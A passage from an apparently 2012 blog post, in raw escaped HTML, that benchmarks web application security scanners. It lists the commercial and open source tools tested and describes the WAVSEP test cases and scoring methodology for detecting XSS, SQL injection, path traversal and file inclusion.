&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;white-space: pre;&quot;&gt;&amp;nbsp;     &lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/76.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;IBM AppScan&lt;/a&gt; &lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;v8.5.0.1,
Build 42-SR1434&lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;&lt;i&gt; (IBM)&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/62.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;WebInspect&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v9.20.277.0,
SecureBase 4.08.00 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(HP)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/68.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;Netsparker&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v2.1.0,
Build 45 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Mavituna Security)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/65.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;Acunetix WVS&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;
v8.0, Build 20120613 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Acunetix)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/69.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;Syhunt Dynamic (SandcatPro)&lt;/a&gt; &lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;v4.5.0.0/1 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Syhunt)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/60.html&quot; style=&quot;font-style: italic;&quot; target=&quot;_blank&quot;&gt;Burp Suite&lt;/a&gt;&lt;/b&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;
v1.4.10 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Portswigger)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/64.html&quot; style=&quot;font-style: italic;&quot; target=&quot;_blank&quot;&gt;ParosPro&lt;/a&gt;&lt;/b&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v1.9.12
&lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Milescan&lt;i&gt;) &lt;/i&gt;&lt;/b&gt;&lt;i style=&quot;text-indent: -18pt;&quot;&gt;- WIVET / Other&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/67.html&quot; style=&quot;font-weight: bold;&quot; target=&quot;_blank&quot;&gt;JSky&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v3.5.1-905
&lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(NoSec)&lt;/b&gt;&lt;i style=&quot;text-indent: -18pt;&quot;&gt; - WIVET / Other&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/66.html&quot; style=&quot;font-weight: bold;&quot; target=&quot;_blank&quot;&gt;WebCruiser&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;
v2.5.1 EE &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Janus Security)&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/74.html&quot; style=&quot;font-style: italic;&quot; target=&quot;_blank&quot;&gt;Nessus&lt;/a&gt;&lt;/b&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v5.0.1
- 20120701 &lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(Tenable Network Security)&lt;/b&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; - Web Scanning
Features&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/79.html&quot; style=&quot;font-style: italic; font-weight: bold;&quot; target=&quot;_blank&quot;&gt;Ammonite&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;text-indent: -18pt;&quot;&gt; v1.2
&lt;/span&gt;&lt;b style=&quot;text-indent: -18pt;&quot;&gt;(RyscCorp)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l3 level1 lfo2; text-indent: -18.0pt;&quot;&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;The
following &lt;b&gt;new&lt;/b&gt; &lt;b&gt;free &amp;amp; open source&lt;/b&gt; scanners were &lt;b&gt;included&lt;/b&gt;
in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;IronWASP v0.9.1.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;The updated versions of the following &lt;b&gt;free &amp;amp; open
source&lt;/b&gt; scanners were &lt;b&gt;re-tested&lt;/b&gt; in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;Zed Attack Proxy (ZAP) &lt;/i&gt;&lt;/b&gt;v1.4.0.1, &lt;b&gt;&lt;i&gt;sqlmap&lt;/i&gt;&lt;/b&gt;
v1.0-Jul-5-2012 (Github), &lt;b&gt;&lt;i&gt;W3AF&lt;/i&gt;&lt;/b&gt; 1.2-rev509 (SVN), &lt;b&gt;&lt;i&gt;Acunetix
Free Edition&lt;/i&gt;&lt;/b&gt; v8.0-20120509, &lt;b&gt;&lt;i&gt;Safe3WVS&lt;/i&gt;&lt;/b&gt; v10.1 FE (Safe3
Network Center)&lt;b&gt;&lt;i&gt; WebSecurify&lt;/i&gt;&lt;/b&gt; v0.9 (free edition - the new
commercial version was not tested&lt;i&gt;)&lt;b&gt;, Syhunt Mini (Sandcat Mini)&lt;/b&gt;&lt;/i&gt; v4.4.3.0,
&lt;b&gt;&lt;i&gt;arachni&lt;/i&gt;&lt;/b&gt; v0.4.0.3, &lt;b&gt;&lt;i&gt;Skipfish&lt;/i&gt;&lt;/b&gt; 2.07b, &lt;b&gt;&lt;i&gt;N-Stalker
2012&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Free Edition&lt;/i&gt;&lt;/b&gt; v7.1.1.121 (N-Stalker), &lt;b&gt;&lt;i&gt;Watobo&lt;/i&gt;&lt;/b&gt;
v0.9.8-rev724 (a few new WATOBO 0.9.9 pre versions were released a few days
before the publication of the benchmark, but I didn&#39;t managed to test them in
time)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;Different aspects of the following &lt;b&gt;free &amp;amp; open
source&lt;/b&gt; scanners were &lt;b&gt;tested&lt;/b&gt; in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;VEGA&lt;/i&gt;&lt;/b&gt; 1.0 beta (Subgraph), &lt;b&gt;&lt;i&gt;Netsparker
Community Edition&lt;/i&gt;&lt;/b&gt; v1.7.2.13, &lt;b&gt;&lt;i&gt;Andiparos&lt;/i&gt;&lt;/b&gt; v1.0.6, &lt;b&gt;&lt;i&gt;ProxyStrike&lt;/i&gt;&lt;/b&gt;
v2.2,&lt;b&gt;&lt;i&gt; Wapiti&lt;/i&gt;&lt;/b&gt; v2.2.1, &lt;b&gt;&lt;i&gt;Paros Proxy&lt;/i&gt;&lt;/b&gt; v3.2.13, &lt;b&gt;&lt;i&gt;Grendel
Scan&lt;/i&gt;&lt;/b&gt; v1.0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;The results were compared to those of unmaintained scanners
tested in previous benchmarks:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;PowerFuzzer&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;Oedipus&lt;/i&gt;&lt;/b&gt; v1.8.1
(v1.8.3 is around somewhere), &lt;b&gt;&lt;i&gt;Scrawler&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;WebCruiser&lt;/i&gt;&lt;/b&gt;
v2.4.2 FE (corrections), &lt;b&gt;&lt;i&gt;Sandcat Free Edition&lt;/i&gt;&lt;/b&gt; v4.0.0.1,&lt;b&gt;&lt;i&gt; JSKY
Free Edition&lt;/i&gt;&lt;/b&gt; v1.0.0,&lt;b&gt;&lt;i&gt; N-Stalker 2009 Free Edition&lt;/i&gt;&lt;/b&gt; v7.0.0.223,&lt;b&gt;&lt;i&gt;
UWSS (Uber Web Security Scanner)&lt;/i&gt;&lt;/b&gt; v0.0.2,&lt;b&gt;&lt;i&gt; Grabber&lt;/i&gt;&lt;/b&gt; v0.1, &lt;b&gt;&lt;i&gt;WebScarab&lt;/i&gt;&lt;/b&gt;
v20100820,&lt;b&gt;&lt;i&gt; Mini MySqlat0r&lt;/i&gt;&lt;/b&gt; v0.5, &lt;b&gt;&lt;i&gt;WSTool&lt;/i&gt;&lt;/b&gt; v0.14001,&lt;b&gt;&lt;i&gt;
crawlfish&lt;/i&gt;&lt;/b&gt; v0.92, &lt;b&gt;&lt;i&gt;Gamja&lt;/i&gt;&lt;/b&gt; v1.6, &lt;b&gt;&lt;i&gt;iScan&lt;/i&gt;&lt;/b&gt; v0.1, &lt;b&gt;&lt;i&gt;LoverBoy&lt;/i&gt;&lt;/b&gt;
v1.0, &lt;b&gt;&lt;i&gt;DSSS (Damn Simple SQLi Scanner)&lt;/i&gt;&lt;/b&gt; v0.1h, &lt;b&gt;&lt;i&gt;openAcunetix&lt;/i&gt;&lt;/b&gt;
v0.1, &lt;b&gt;&lt;i&gt;ScreamingCSS&lt;/i&gt;&lt;/b&gt; v1.02, &lt;b&gt;&lt;i&gt;Secubat&lt;/i&gt;&lt;/b&gt; v0.5, &lt;b&gt;&lt;i&gt;SQID
(SQL Injection Digger)&lt;/i&gt;&lt;/b&gt; v0.3, &lt;b&gt;&lt;i&gt;SQLiX&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;VulnDetector&lt;/i&gt;&lt;/b&gt;
v0.0.2, &lt;b&gt;&lt;i&gt;Web Injection Scanner&lt;/i&gt;&lt;/b&gt; &amp;nbsp;(WIS) v0.4, &lt;b&gt;&lt;i&gt;Xcobra&lt;/i&gt;&lt;/b&gt; v0.2, &lt;b&gt;&lt;i&gt;XSSploit&lt;/i&gt;&lt;/b&gt;
v0.5, &lt;b&gt;&lt;i&gt;XSSS&lt;/i&gt;&lt;/b&gt; v0.40, &lt;b&gt;&lt;i&gt;Priamos&lt;/i&gt;&lt;/b&gt; v1.0, &lt;b&gt;&lt;i&gt;XSSer&lt;/i&gt;&lt;/b&gt;
v1.5-1 (version 1.6 was released but I didn&#39;t manage to test it), &lt;b&gt;&lt;i&gt;aidSQL&lt;/i&gt;&lt;/b&gt;
02062011 (a newer revision exists in the SVN but was not officially released)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For a full list of commercial &amp;amp; open source tools that
were &lt;b&gt;not&lt;/b&gt; tested in this benchmark, refer to the appendix.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;3. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Overview &amp;amp; Assessment
Criteria&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The benchmark focused on testing commercial &amp;amp; open
source tools that are able to &lt;b&gt;detect&lt;/b&gt; (and not necessarily exploit) security
vulnerabilities on a wide range of URLs, and thus, each tool tested was
required to support the following features:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l1 level1 lfo4; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to detect
Reflected XSS and/or SQL Injection and/or Path Traversal/Local File
Inclusion/Remote File Inclusion vulnerabilities.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo4; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to scan
multiple URLs at once (using either a crawler/spider feature, URL/Log file
parsing feature or a built-in proxy).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l1 level1 lfo4; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to control and
limit the scan to internal or external host (domain/IP).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The testing procedure of all the tools included the
following phases:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Feature Documentation&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The features of each scanner were documented and compared,
according to documentation, configuration, plugins and information received
from the vendor.&lt;b&gt; &lt;/b&gt;The features were then divided into groups, which were
used to compose various hierarchal charts.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Accuracy Assessment&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The scanners were all tested against the latest version of &lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;WAVSEP&lt;/a&gt; (v1.2, integrating ZAP-WAVE),
a benchmarking platform designed to assess the detection accuracy of web
application scanners, which was released with the publication of this benchmark.
The purpose of WAVSEP’s test cases is to provide a scale for understanding
which detection barriers each scanning tool can bypass, and which &lt;b&gt;&lt;u&gt;common&lt;/u&gt;&lt;/b&gt;
vulnerability variations can be detected by each tool. &lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l4 level1 lfo5; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The various scanners were
tested against the following test cases (GET and POST attack vectors):&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;816&lt;/b&gt; test cases that
were vulnerable to &lt;b&gt;Path Traversal attacks&lt;/b&gt;.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;108&lt;/b&gt; test cases that
were vulnerable to &lt;b&gt;Remote File Inclusion&lt;/b&gt; &lt;b&gt;(XSS via RFI)&lt;/b&gt; attacks.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;66&lt;/b&gt; test cases that
were vulnerable to &lt;b&gt;Reflected Cross Site Scripting&lt;/b&gt; attacks.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;80&lt;/b&gt; test cases that
contained &lt;b&gt;Error Disclosing SQL Injection&lt;/b&gt; exposures.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;46&lt;/b&gt; test cases that
contained &lt;b&gt;Blind SQL Injection&lt;/b&gt; exposures.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;10&lt;/b&gt; test cases that
were vulnerable to &lt;b&gt;Time Based SQL Injection&lt;/b&gt; attacks.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;7&lt;/b&gt; different
categories of &lt;b&gt;&lt;i&gt;false positive&lt;/i&gt;&lt;/b&gt; RXSS vulnerabilities.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;10&lt;/b&gt; different
categories of &lt;b&gt;&lt;i&gt;false positive&lt;/i&gt;&lt;/b&gt; SQLi vulnerabilities.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;8 &lt;/b&gt;different
categories of &lt;b&gt;false positive&lt;/b&gt; Path Travesal / LFI vulnerabilities.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;6 &lt;/b&gt;different
categories of &lt;b&gt;false positive&lt;/b&gt; Remote File Inclusion vulnerabilities.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;The benchmark included 8
experimental RXSS test cases and 2 experimental SQL Injection test cases, and
although the scan results of these test cases were documented in the various
scans, their results were not included in the final score, at least for now. &lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l2 level1 lfo3; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;In order to ensure the
result consistency, the directory of each exposure sub category was
individually scanned multiple times using various configurations, usually using
a single thread and using a scan policy that only included the relevant plugins.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to ensure that the detection features of each scanner were truly effective, most of the scanners were tested against an additional benchmarking application that was prone to the same vulnerable test cases as the WAVSEP platform, but had a different design, slightly different behavior and different entry point format, in order to verify that no signatures were used, and that any improvement was due to the enhancement of the scanner&#39;s attack tree.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQvPzVvNH07eO-pjY8QuQ4rdwg65G4SCv4l-NrpvVdHRi8uZq5XuNuBvfI3IJhey97qQCqbThSnfpcvAxiTqj3NmucveUsPqJnoHIUk4wT6bgZkCER1UejyF1m1BkSaisdyEVByBDv0FQ/s1600/wavsep.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;390&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQvPzVvNH07eO-pjY8QuQ4rdwg65G4SCv4l-NrpvVdHRi8uZq5XuNuBvfI3IJhey97qQCqbThSnfpcvAxiTqj3NmucveUsPqJnoHIUk4wT6bgZkCER1UejyF1m1BkSaisdyEVByBDv0FQ/s640/wavsep.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Attack Surface Coverage Assessment&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to assess the scanners attack surface coverage, the
assessment included tests that measure the efficiency of the scanner&#39;s
automated crawling mechanism (input vector extraction) , and feature
comparisons meant to assess its support for various technologies and its ability
to handle different scan barriers.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
